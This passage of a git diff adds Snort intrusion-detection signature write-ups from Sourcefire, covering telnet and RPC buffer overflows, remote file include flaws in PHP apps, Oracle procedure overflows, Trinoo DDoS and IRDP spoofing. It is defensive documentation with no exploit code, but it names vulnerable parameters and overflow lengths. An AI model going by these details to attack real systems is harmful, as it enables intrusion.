+privileges of the user running the telnet server is possible.
+
+--
+Detailed Information:
+If the GoodTech telnet server recieves 10,083 bytes before a newline, a buffer 
+will be overflowed. If properly crafted data is sent, arbitrary code may be 
+executed with the privileges of the user running the server. Note that the rule 
+looks for 1,000 or more bytes before a newline, due to limitations which do not 
+allow a search for the full number of bytes required for the exploit.
+
+--
+Affected Systems:
+GoodTech Telnet Server 4.0
+GoodTech Telnet Server 5.0
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to version 5.0.7 of the affected software.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/679.txt
@@ -0,0 +1,78 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+	
+--
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_addp_0awi.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1055.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1055
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1683.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1683
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/995.txt
@@ -0,0 +1,63 @@
+Rule
+
+--
+Sid:
+995
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 servers that were upgraded from IIS 2 or 3 have a legacy ism.dll file that allows web-based administration.  Upon sending a request to ism.dll, the user will be prompted for a userid and password.  An attacker can attempt to brute force guess a password, allowing remote access to the server.
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0 servers upgraded from IIS 2.0 or 3.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of ISS.
+
+Consider running the IIS Lockdown Tool to disable unnecessary functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1538
+
+Bugtraq
+http://www.securityfocus.com/bid/189
+
+--
--- /dev/null
+++ b/doc/signatures/3423.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3423
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1092.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1092
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2481.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000609.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000609
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_bad_delete.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_bad_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000385.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "error.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "error.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/653.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+653
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1853.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1853
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trinoo DDoS Trojan server.
+
+--
+Impact:
+Possible Distributed Denial of Service.
+
+--
+Detailed Information:
+This Trojan affects Windows and Linux operating systems:
+
+Trinoo is used as a Distributed Denial of Service (DDoS) agent and can 
+launch DDoS attacks from a large number of hosts against a target.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/402.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+402
+
+--
+Summary:
+This event is generated when an ICMP Port Unreachable message was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+An ICMP Port Unreachable is not an attack, but may indicate that the source
+of the packet was the target of a scan or other malicious activity.
+
+An ICMP Port Unreachable (ICMP type 3 code 3) indicates that someone or
+something tried to connect to a port on a system that was not available
+(i.e., no service was running on that port).
+
+This is analagous to RST packets in TCP.  Since UDP does not have an
+equivalent, it relies upon ICMP Port Unreachable for this. This often
+indicates someone was scanning for UDP services.
+
+--
+Affected Systems:
+	All systems
+ 
+--
+Attack Scenarios:
+An attacker may use a port scanner to determine possible attack vectors
+as a prelude to a directed attack against a system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This kind of packet is common on networks, and may be generated by simple
+misconfigurations on either the source or destination, or service outage.
+
+--
+False Negatives:
+Not all operating systems will respond with ICMP Port Unreachable
+messages when no service is running.
+
+--
+Corrective Action:
+Examine the activity of the recipient of this packet to see if the
+recipient was responsible for scanning or other behavior.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+RFC 792:
+http://www.faqs.org/rfcs/rfc792.html
+
+--
--- /dev/null
+++ b/doc/signatures/2749.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2749
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1096.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1096
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000728.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000728
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "functions.inc" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "functions.inc" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/526.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid: 526
+
+--
+Summary:
+This event is generated when SYN packets contain data greater than what 
+is normally expected.
+
+--
+Impact:
+Possible Denial of Service attack (DoS) or IDS evasion.
+
+--
+Detailed Information:
+Under normal circumstances TCP SYN packets are exchanged between hosts 
+to synchronize the TCP sequence numbers in a transaction. A SYN packet 
+with a datagram size larger than 6 bytes may be an indication of a 
+Denial of Service attack or an attempt to evade IDS.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted packets with the SYN 
+flag set with a datagram size larger than 6 bytes. This may be achieved 
+using a script or tool.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html
+
+--
--- /dev/null
+++ b/doc/signatures/2852.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2852
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_mview_support
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/364.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+364
+
+--
+Summary:
+This event is generated when an external server sends an ICMP IRDP router advertisement message to an internal server. This may indicate an attempt to cause a denial of service by adding spoofed router information to an IRDP-enabled host's routing table.
+
+--
+Impact:
+Denial of service. 
+
+--
+Detailed Information:
+The ICMP Router Discovery Protocol (IRDP) is enabled by default on some Microsoft Windows and Sun Solaris operating systems. IRDP messages broadcast network routing information, and computers with IRDP enabled will store this routing information in their default routing tables. There is no way to determine whether the IRDP broadcast is authentic or spoofed, and some hosts will use the routes that appear in their local routing tables before using routes discovered via DHCP.
+
+An attacker can exploit this behavior by broadcasting IRDP messages with erroneous routing information to a target network. This will cause some IRDP-enabled hosts on that network to route traffic through the route advertised in the spoofed IRDP message. If the spoofed IRDP message contains nonexistent/inaccessible routing addresses, the target will not be able to connect to external networks, causing a denial of service. This may also facilitate man-in-the-middle attacks or interception of data by an attacker.
+
+Note that if an attacker is on the internal network, he/she can use valid routing addresses in the spoofed IRDP messages to passively monitor other machines or to perform "man-in-the-middle" attacks.
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Sun Solaris 2.6
+
+--
+Attack Scenarios:
+An attacker crafts spoofed IRDP broadcast messages and forwards them to a target network. If the messages are not filtered by the firewall and are broadcast to the internal network, some IRDP-enabled hosts begin routing traffic through the routes advertised in the IRDP broadcast message, which can cause a denial of service condition.
+
+--
+Ease of Attack:
+Simple. A proof-of-concept exists.
+
+--
+False Positives:
+This rule may generate an alert if legitimate ICMP traffic of type 10 is sent from an external server to an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+For vulnerable Windows computers, disable IRDP on the vulnerable system (see http://support.microsoft.com/support/kb/articles/q216/1/41.asp).
+
+For vulnerable Solaris 2.6 computers, install the patch provided by Sun (see http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-access).
+
+Use a packet filtering firewall to block ICMP type 9 packets from entering the internal network.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0875
+
+Arachnids:
+http://www.whitehats.com/info/IDS174
+
+Bugtraq:
+http://www.securityfocus.com/bid/578
+
+RFC:
+http://www.cotse.com/CIE/RFC/Orig/rfc1256.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2402.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2402
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule may not generate an alert if a legitimate SMB request contains a password
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
--- /dev/null
+++ b/doc/signatures/100000348.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000348
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "customize.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
